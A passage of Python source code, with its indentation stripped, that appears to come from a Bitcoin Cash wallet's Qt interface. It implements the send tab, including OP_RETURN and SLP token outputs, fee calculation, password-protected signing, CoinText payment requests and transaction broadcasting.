completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('&Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
description_label.setBuddy(self.message_e)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg_opreturn = ( _('OP_RETURN data (optional).') + '\n\n'
+ _('Posts a PERMANENT note to the BCH blockchain as part of this transaction.')
+ '\n\n' + _('If you specify OP_RETURN text, you may leave the \'Pay to\' field blank.') )
self.opreturn_label = HelpLabel(_('&OP_RETURN'), msg_opreturn)
grid.addWidget(self.opreturn_label, 3, 0)
self.message_opreturn_e = MyLineEdit()
self.opreturn_label.setBuddy(self.message_opreturn_e)
hbox = QHBoxLayout()
hbox.addWidget(self.message_opreturn_e)
self.opreturn_rawhex_cb = QCheckBox(_('&Raw hex script'))
self.opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
hbox.addWidget(self.opreturn_rawhex_cb)
grid.addLayout(hbox, 3, 1, 1, -1)
self.send_tab_opreturn_widgets = [
self.message_opreturn_e,
self.opreturn_rawhex_cb,
self.opreturn_label,
]
self.from_label = QLabel(_('&From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_label.setBuddy(self.from_list)
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
if self.is_slp_wallet:
msg = _('Token Amount to be sent.') + '\n\n' \
+ _("To enable make sure 'Address Mode' is set to SLP.") + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
self.slp_amount_label = HelpLabel(_('Token Amount'), msg)
msg = _('Select the SLP token to send.')
self.slp_token_type_label = HelpLabel(_('Token Type'), msg)
grid.addWidget(self.slp_token_type_label, 5, 0)
grid.addWidget(self.token_type_combo, 5, 1)
grid.addWidget(self.slp_amount_label, 6, 0)
hbox = QHBoxLayout()
self.amount_e.setMinimumWidth(195)
self.slp_amount_e.setMinimumWidth(195)
self.slp_amount_e.textEdited.connect(self.update_fee)
hbox.addWidget(self.slp_amount_e)
self.slp_max_button = EnterButton(_("Max"), self.slp_spend_max)
hbox.addWidget(self.slp_max_button)
grid.addLayout(hbox, 6, 1)
self.slp_extra_bch_cb = QCheckBox(_('Also send BCH?'))
self.slp_extra_bch_cb.clicked.connect(self.on_slp_extra_bch)
self.slp_extra_bch_cb.setHidden(True)
grid.addWidget(self.slp_extra_bch_cb, 6, 2)
self.slp_send_tab_widgets += [
self.slp_max_button, self.slp_extra_bch_cb
]
msg = _('BCH amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
self.amount_label = HelpLabel(_('BCH &Amount'), msg)
self.amount_label.setBuddy(self.amount_e)
grid.addWidget(self.amount_label, 7, 0)
hbox = QHBoxLayout()
hbox.addWidget(self.amount_e)
self.max_button = EnterButton(_("&Max"), self.spend_max)
self.max_button.setCheckable(True)
hbox.addWidget(self.max_button)
grid.addLayout(hbox, 7, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 7, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
msg = _('Bitcoin Cash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('F&ee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_e_label.setBuddy(self.fee_slider)
self.fee_slider.setFixedWidth(140)
self.fee_custom_lbl = HelpLabel(self.get_custom_fee_text(),
_('This is the fee rate that will be used for this transaction.')
+ "\n\n" + _('It is calculated from the Custom Fee Rate in preferences, but can be overridden from the manual fee edit on this form (if enabled).')
+ "\n\n" + _('Generally, a fee of 1.0 sats/B is a good minimal rate to ensure your transaction will make it into the next block.'))
self.fee_custom_lbl.setFixedWidth(140)
self.fee_slider_mogrifier()
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
grid.addWidget(self.fee_e_label, 9, 0)
hbox = QHBoxLayout()
hbox.addWidget(self.fee_slider)
hbox.addWidget(self.fee_custom_lbl)
hbox.addWidget(self.fee_e)
hbox.addStretch(1)
grid.addLayout(hbox, 9, 1)
self.preview_button = EnterButton(_("&Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("&Send"), self.do_send)
self.cointext_button = EnterButton(_("Coin&Text"), self.do_cointext)
self.cointext_button.setToolTip(_('Process CoinText, transforming it into a BIP70 payment request.'))
self.clear_button = EnterButton(_("&Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
buttons.addWidget(self.cointext_button)
buttons.addStretch(1)
grid.addLayout(buttons, 11, 1, 1, 3)
self.payto_e.textChanged.connect(self.update_buttons_on_seed) # hide/unhide cointext button, etc
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textChanged.connect(self.update_fee)
self.message_opreturn_e.editingFinished.connect(self.update_fee)
self.opreturn_rawhex_cb.stateChanged.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
if not self.slp_token_id:
enabled = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enabled)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
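# Colours the amount/fee fields and updates the status bar whenever the send-tab
# entries change; SLP balance errors take precedence over the BCH checks.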
def entry_changed():
if self.is_slp_wallet:
hasError = entry_changed_slp()
if not hasError:
entry_changed_bch()
else:
entry_changed_bch()
def entry_changed_bch():
text = ""
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
text = _( "Not enough BCH" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
slp = self.wallet.get_slp_locked_balance()
if slp > 0:
text += " (" + self.format_amount(slp).strip() + " BCH held in tokens)"
extra = run_hook("not_enough_funds_extra", self)
if isinstance(extra, str) and extra:
text += " ({})".format(extra)
elif self.fee_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.DEFAULT
elif self.amount_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.BLUE
else:
amt_color, fee_color = ColorScheme.BLUE, ColorScheme.BLUE
opret_color = ColorScheme.DEFAULT
if self.op_return_toolong:
opret_color = ColorScheme.RED
text = _("OP_RETURN message too large, needs to be no longer than 220 bytes") + (", " if text else "") + text
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.message_opreturn_e.setStyleSheet(opret_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textEdited.connect(entry_changed)
self.message_opreturn_e.editingFinished.connect(entry_changed)
self.opreturn_rawhex_cb.stateChanged.connect(entry_changed)
if self.is_slp_wallet:
self.slp_amount_e.textChanged.connect(entry_changed)
self.slp_amount_e.editingFinished.connect(entry_changed)
def entry_changed_slp():
if self.token_type_combo.currentData():
text = ""
name = self.wallet.token_types.get(self.slp_token_id)['name']
decimals = self.wallet.token_types.get(self.slp_token_id)['decimals']
if self.not_enough_funds_slp or self.not_enough_unfrozen_funds_slp:
bal_avail, x, x, x, frozen_amt = self.wallet.get_slp_token_balance(self.slp_token_id, { 'user_config': { 'confirmed_only': False }})
del x
if self.not_enough_funds_slp:
amt_color = ColorScheme.RED
text = "Not enough " + \
name + " tokens (" + \
format_satoshis_plain_nofloat(bal_avail, decimals) + " valid"
if self.config.get('confirmed_only', False):
conf_bal_avail = self.wallet.get_slp_token_balance(self.slp_token_id, self.config)[0]
unconf_bal = bal_avail - conf_bal_avail
if unconf_bal > 0:
text += ", " + format_satoshis_plain_nofloat(unconf_bal, decimals) + " unconfirmed)"
else:
text += ")"
else:
text += ")"
elif self.not_enough_unfrozen_funds_slp:
amt_color = ColorScheme.RED
text = "Not enough unfrozen " + name + " tokens (" + \
format_satoshis_plain_nofloat(bal_avail, decimals) + " valid, " + \
format_satoshis_plain_nofloat(frozen_amt, decimals) + " frozen)"
elif self.slp_amount_e.isModified():
amt_color = ColorScheme.DEFAULT
else:
amt_color = ColorScheme.BLUE
try:
if self.slp_amount_e.get_amount() > (2 ** 64) - 1:
amt_color = ColorScheme.RED
maxqty = format_satoshis_plain_nofloat((2 ** 64) - 1, self.wallet.token_types.get(self.slp_token_id)['decimals'])
text = _('Token output quantity is too large. Maximum {maxqty}.').format(maxqty=maxqty)
except TypeError:
pass
self.statusBar().showMessage(text)
self.slp_amount_e.setStyleSheet(amt_color.as_stylesheet())
if text != "":
return True
return False
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
self.invoice_list.chkVisible()
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.max_button.setChecked(True)
self.do_update_fee()
def slp_spend_max(self):
self.slp_amount_e.setAmount(self.wallet.get_slp_token_balance(self.slp_token_id, self.config)[3])
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def get_custom_fee_text(self, fee_rate = None):
if not self.config.has_custom_fee_rate():
return ""
else:
if fee_rate is None: fee_rate = self.config.custom_fee_rate() / 1000.0
return str(round(fee_rate*100)/100) + " sats/B"
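# Builds an OP_RETURN script output from '<push>'-delimited text; each push may
# be '<hex>'-prefixed hex data, the literal '<empty>', or plain text (UTF-8 encoded to hex).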
@staticmethod
def output_for_opreturn_stringdata(op_return):
if not isinstance(op_return, str):
raise OPReturnError('OP_RETURN parameter needs to be of type str!')
pushes = op_return.split('<push>')
script = "OP_RETURN"
for data in pushes:
if data.startswith("<hex>"):
data = data.replace("<hex>", "")
elif data.startswith("<empty>"):
pass
else:
data = data.encode('utf-8').hex()
script = script + " " + data
scriptBuffer = ScriptOutput.from_string(script)
if len(scriptBuffer.script) > 223:
raise OPReturnTooLarge(_("OP_RETURN message too large, needs to be no longer than 220 bytes"))
amount = 0
return (TYPE_SCRIPT, scriptBuffer, amount)
@staticmethod
def output_for_opreturn_rawhex(op_return):
if not isinstance(op_return, str):
raise OPReturnError('OP_RETURN parameter needs to be of type str!')
if op_return == 'empty':
op_return = ''
try:
op_return_script = b'\x6a' + bytes.fromhex(op_return.strip())
except ValueError:
raise OPReturnError(_('OP_RETURN script expected to be hexadecimal bytes'))
if len(op_return_script) > 223:
raise OPReturnTooLarge(_("OP_RETURN script too large, needs to be no longer than 223 bytes"))
amount = 0
return (TYPE_SCRIPT, ScriptOutput(op_return_script), amount)
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
bch_outputs = []
token_output_amts = []
self.not_enough_funds = False
self.not_enough_funds_slp = False
self.not_enough_unfrozen_funds_slp = False
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
fee_rate = None
if self.is_slp_wallet:
slp_amount = self.slp_amount_e.get_amount()
if amount is None and slp_amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.statusBar().showMessage('')
return
else:
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.statusBar().showMessage('')
return
try:
selected_slp_coins = []
if self.slp_token_id:
amt = slp_amount or 0
selected_slp_coins, slp_op_return_msg = SlpCoinChooser.select_coins(self.wallet, self.slp_token_id, amt, self.config)
if slp_op_return_msg:
bch_outputs = [ slp_op_return_msg ]
token_output_amts = slp.SlpMessage.parseSlpOutputScript(bch_outputs[0][1]).op_return_fields['token_output']
for amt in token_output_amts:
# just grab a dummy address for this fee calculation - safe for imported_privkey wallets
bch_outputs.append((TYPE_ADDRESS, self.wallet.get_addresses()[0], 546))
bch_payto_outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if bch_payto_outputs and bch_payto_outputs[0][2]:
bch_outputs.extend(bch_payto_outputs)
elif self.slp_token_id and amount and not bch_payto_outputs:
_type, addr = self.get_payto_or_dummy()
bch_outputs.append((_type, addr, amount))
if not bch_outputs:
_type, addr = self.get_payto_or_dummy()
bch_outputs.append((_type, addr, amount))
if not self.slp_token_id:
opreturn_message = self.message_opreturn_e.text() if self.config.get('enable_opreturn') else None
if (opreturn_message != '' and opreturn_message is not None):
if self.opreturn_rawhex_cb.isChecked():
bch_outputs.insert(0, self.output_for_opreturn_rawhex(opreturn_message))
else:
bch_outputs.insert(0, self.output_for_opreturn_stringdata(opreturn_message))
fee = self.fee_e.get_amount() if freeze_fee else None
tx = self.wallet.make_unsigned_transaction(self.get_coins(isInvoice = False), bch_outputs, self.config, fee, mandatory_coins=selected_slp_coins)
if self.slp_token_id:
self.wallet.check_sufficient_slp_balance(slp.SlpMessage.parseSlpOutputScript(slp_op_return_msg[1]), self.config)
self.not_enough_funds = False
self.op_return_toolong = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except NotEnoughFundsSlp:
self.not_enough_funds_slp = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except NotEnoughUnfrozenFundsSlp:
self.not_enough_unfrozen_funds_slp = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except OPReturnTooLarge:
self.op_return_toolong = True
return
except OPReturnError as e:
self.statusBar().showMessage(str(e))
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
if not self.slp_token_id or len(token_output_amts) > 0:
self.fee_e.setAmount(fee)
if self.max_button.isChecked():
amount = tx.output_value()
if self.is_slp_wallet:
amount = tx.output_value() - len(token_output_amts) * 546
self.amount_e.setAmount(amount)
if fee is not None:
fee_rate = fee / tx.estimated_size()
self.fee_slider_mogrifier(self.get_custom_fee_text(fee_rate))
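# Shows either the fee slider or the custom fee-rate label, depending on whether
# a custom fee rate is configured.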
def fee_slider_mogrifier(self, text = None):
fee_slider_hidden = self.config.has_custom_fee_rate()
self.fee_slider.setHidden(fee_slider_hidden)
self.fee_custom_lbl.setHidden(not fee_slider_hidden)
if text is not None: self.fee_custom_lbl.setText(text)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
if not item:
return
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x['prevout_hash']
return '{}...{}:{:d}\t{}'.format(h[0:10], h[-10:],
x['prevout_n'], x['address'])
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
on_pw_cancel = kwargs.pop('on_pw_cancel', None)
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
if callable(on_pw_cancel):
on_pw_cancel()
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
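# Collects and validates the send-tab inputs; returns
# (bch_outputs, fee, label, coins, selected_slp_coins), or None on validation errors.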
def read_send_tab(self, preview=False):
bch_outputs = []
selected_slp_coins = []
opreturn_message = self.message_opreturn_e.text() if self.config.get('enable_opreturn') else None
if self.slp_token_id:
if self.slp_amount_e.get_amount() == 0 or self.slp_amount_e.get_amount() is None:
self.show_message(_("No SLP token amount provided."))
return
try:
""" Guard against multiline 'Pay To' field """
if self.payto_e.is_multiline():
self.show_error(_("Too many receivers listed.\n\nCurrently this wallet only supports a single SLP token receiver."))
return
""" Guard against bad address encoding """
if not self.payto_e.payto_address:
self.show_error(_("Receiver SLP address is missing."))
return
""" Require SLPADDR prefix in 'Pay To' field. """
if networks.net.SLPADDR_PREFIX not in self.payto_e.address_string_for_slp_check:
self.show_error(_("Address provided is not in SLP Address format.\n\nThe address should be encoded using 'simpleledger:' or 'slptest:' URI prefix."))
return
amt = self.slp_amount_e.get_amount()
selected_slp_coins, slp_op_return_msg = SlpCoinChooser.select_coins(self.wallet, self.slp_token_id, amt, self.config)
if slp_op_return_msg:
bch_outputs = [ slp_op_return_msg ]
except OPReturnTooLarge as e:
self.show_error(str(e))
return
except OPReturnError as e:
self.show_error(str(e))
return
except (NotEnoughFundsSlp, NotEnoughUnfrozenFundsSlp) as e:
self.show_error(str(e))
return
isInvoice = False
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
if self.slp_token_id:
self.show_error('BIP-70 Payment requests are not yet working for SLP tokens.')
return
isInvoice = True
bch_outputs.extend(self.payment_request.get_outputs())
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
if self.slp_token_id:
_type, _addr = self.payto_e.payto_address
bch_outputs.append((_type, _addr, 546))
if self.payto_e.is_alias and not self.payto_e.validated:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
coins = self.get_coins(isInvoice=isInvoice)
""" SLP: Add an additional token change output """
if self.slp_token_id:
change_addr = None
token_outputs = slp.SlpMessage.parseSlpOutputScript(bch_outputs[0][1]).op_return_fields['token_output']
if len(token_outputs) > 1 and len(bch_outputs) < len(token_outputs):
""" start of logic copied from wallet.py """
addrs = self.wallet.get_change_addresses()[-self.wallet.gap_limit_for_change:]
if self.wallet.use_change and addrs:
# New change addresses are created only after a few
# confirmations. Select the unused addresses within the
# gap limit; if none take one at random
change_addrs = [addr for addr in addrs if
self.wallet.get_num_tx(addr) == 0]
if not change_addrs:
import random
change_addrs = [random.choice(addrs)]
change_addr = change_addrs[0]
elif len(change_addrs) > 1:
change_addr = change_addrs[1]
else:
change_addr = change_addrs[0]
elif coins:
change_addr = coins[0]['address']
else:
change_addr = self.wallet.get_addresses()[0]
bch_outputs.append((TYPE_ADDRESS, change_addr, 546))
# add normal BCH amounts
if not self.payment_request and self.amount_e.get_amount():
bch_outputs.extend(self.payto_e.get_outputs(self.max_button.isChecked()))
""" Only Allow OP_RETURN if SLP is disabled. """
if not self.slp_token_id:
try:
# handle op_return if specified and enabled
opreturn_message = self.message_opreturn_e.text()
if opreturn_message:
if self.opreturn_rawhex_cb.isChecked():
bch_outputs.append(self.output_for_opreturn_rawhex(opreturn_message))
else:
bch_outputs.append(self.output_for_opreturn_stringdata(opreturn_message))
except OPReturnTooLarge as e:
self.show_error(str(e))
return
except OPReturnError as e:
self.show_error(str(e))
return
if not bch_outputs:
self.show_error(_('Enter receiver address (No BCH outputs).'))
return
for _type, addr, amount in bch_outputs:
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
return bch_outputs, fee, label, coins, selected_slp_coins
_cointext_popup_kill_tab_changed_connection = None
def do_cointext(self):
''' This is called by the cointext button 'clicked' signal and it
initiates the processing of the cointext URL. This should only be
called if self.payto_e.cointext is not None, otherwise it will do
nothing. '''
if self.payto_e.cointext and not self.payment_request:
if self.gui_object.warn_if_no_network(self):
return
phone = self.payto_e.cointext
sats = self.amount_e.get_amount()
if sats:
url = "https://pay.cointext.io/p/{}/{}".format(phone, sats)
def get_cointext_pr():
# Runs in thread
self.print_error("CoinText URL", url)
pr = paymentrequest.get_payment_request(url) # raises on error
return pr
def on_success(pr):
# Runs in main thread
if pr:
if pr.error:
self.print_error("CoinText ERROR", pr.error)
self.show_error(_("There was an error processing the CoinText. Please check the phone number and try again."))
return
self.print_error("CoinText RESULT", repr(pr))
self.prepare_for_payment_request()
def show_popup():
if not self.send_button.isVisible():
# likely a watching-only wallet, in which case
# showing the popup label for the send button
# leads to unspecified position for the button
return
show_it = partial(
ShowPopupLabel,
text=_("Please review payment before sending CoinText"),
target=self.send_button, timeout=15000.0,
name="CoinTextPopup",
pointer_position=PopupWidget.LeftSide,
activation_hides=True, track_target=True,
dark_mode = ColorScheme.dark_scheme
)
if not self._cointext_popup_kill_tab_changed_connection:
# this ensures that if user changes tabs, the popup dies
# ... it is only connected once per instance lifetime
self._cointext_popup_kill_tab_changed_connection = self.tabs.currentChanged.connect(lambda: KillPopupLabel("CoinTextPopup"))
QTimer.singleShot(0, show_it)
pr.request_ok_callback = show_popup
self.on_pr(pr)
def on_error(exc):
self.print_error("CoinText EXCEPTION", repr(exc))
self.on_error(exc)
WaitingDialog(self.top_level_window(),
_("Retrieving CoinText info, please wait ..."),
get_cointext_pr, on_success, on_error)
else:
self.show_error(_('CoinText: Please specify an amount'))
def do_preview(self):
self.do_send(preview = True)
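# Reads the send tab, builds an unsigned transaction (including any SLP token
# outputs), asks for confirmation (and the password if needed), then signs and
# either previews or broadcasts it.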
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab(preview=preview)
if not r:
return
outputs, fee, tx_desc, coins, slp_coins = r
if self.slp_token_id:
try:
self.wallet.check_sufficient_slp_balance(slp.SlpMessage.parseSlpOutputScript(outputs[0][1]), self.config)
except slp.SlpInvalidOutputMessage:
self.show_message(_("No token outputs available.\n\nIf you have unconfirmed tokens wait 1 confirmation or turn off 'Spend only confirmed coins' in preferences, and try again."))
return
except NotEnoughFundsSlp:
self.show_message(_("Token balance too low."))
return
except NotEnoughUnfrozenFundsSlp:
self.show_message(_("Unfrozen SLP token balance is too low. Unfreeze some of the token coins associated with with this token."))
return
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee, mandatory_coins=slp_coins)
except NotEnoughFunds:
self.show_message(_("Insufficient BCH balance"))
return
except ExcessiveFee:
self.show_message(_("Your fee is too high. Max is 50 sat/byte."))
return
except BaseException as e:
traceback.print_exc(file=sys.stderr)
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
#if fee < self.wallet.relayfee() * tx.estimated_size() / 1000 and tx.requires_fee(self.wallet):
#self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
#return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
if self.slp_token_id:
slp_amt_str = format_satoshis_plain_nofloat(self.slp_amount_e.get_amount(), self.wallet.token_types.get(self.slp_token_id)['decimals'])
slp_name = self.wallet.token_types[self.slp_token_id]['name']
msg = [
_("BCH amount to be sent") + ": " + self.format_amount_and_units(amount),
"\nToken amount to be sent" + ": " + slp_amt_str + " " + slp_name,
_("\nMining fee") + ": " + self.format_amount_and_units(fee),
]
else:
msg = [
_("\nAmount to be sent") + ": " + self.format_amount_and_units(amount),
_("\nMining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("\nAdditional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
# IN THE FUTURE IF WE WANT TO APPEND SOMETHING IN THE MSG ABOUT THE FEE, CODE IS COMMENTED OUT:
#if fee > confirm_rate * tx.estimated_size() / 1000:
# msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if (fee < (tx.estimated_size())):
msg.append(_('\nWarning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm."))
tx.ephemeral['warned_low_fee_already'] = True
if self.config.get('enable_opreturn') and self.message_opreturn_e.text():
msg.append(_("\nYou are using an OP_RETURN message. This gets permanently written to the blockchain."))
if self.wallet.has_password():
msg.append("")
msg.append(_("\nEnter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('\nProceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx, tx_desc)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password, *, slp_coins_to_burn=None):
self.sign_tx_with_password(tx, callback, password, slp_coins_to_burn=slp_coins_to_burn)
def sign_tx_with_password(self, tx, callback, password, *, slp_coins_to_burn=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# check transaction SLP validity before signing
try:
assert SlpTransactionChecker.check_tx_slp(self.wallet, tx, coins_to_burn=slp_coins_to_burn)
except (Exception, AssertionError) as e:
self.show_warning(str(e))
return
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
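# Broadcasts the transaction in a background thread. For BIP70 payment requests
# the merchant is notified first via send_payment(); a "no url" reply falls back
# to a normal network broadcast. Also warns once if the fee is below 1.0 sats/B.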
def broadcast_transaction(self, tx, tx_desc, *, callback=None):
def broadcast_thread():
# non-GUI thread
status = False
msg = "Failed"
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
if pr:
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_payment(str(tx), refund_address)
if not ack_status:
if ack_msg == "no url":
# "no url" hard-coded in send_payment method
# it means merchant doesn't need the tx sent to him
# since he didn't specify a POST url.
# so we just broadcast and rely on that result status.
ack_msg = None
else:
return False, ack_msg
# at this point either ack_status is True or there is "no url"
# and we proceed anyway with the broadcast
status, msg = self.network.broadcast_transaction(tx)
# figure out what to return...
msg = ack_msg or msg # prefer the merchant's ack_msg over the broadcast msg, but fallback to broadcast msg if no ack_msg.
status = bool(ack_status or status) # if both broadcast and merchant ACK failed -- it's a failure. if either succeeded -- it's a success
if status:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
else:
# Not a PR, just broadcast.
status, msg = self.network.broadcast_transaction(tx)
return status, msg
# Check fee and warn if it's below 1.0 sats/B (and not warned already)
fee = None
try: fee = tx.get_fee()
except: pass # no fee info available for tx
# Check fee >= size otherwise warn. FIXME: If someday network relay
# rules change to be other than 1.0 sats/B minimum, this code needs
# to be changed.
if (isinstance(fee, int) and tx.is_complete() and fee < len(str(tx))//2
and not tx.ephemeral.get('warned_low_fee_already')):
msg = _('Warning') + ': ' + _("You're using a fee of less than 1.0 sats/B. It may take a very long time to confirm.") + "\n\n" + _("Proceed?")
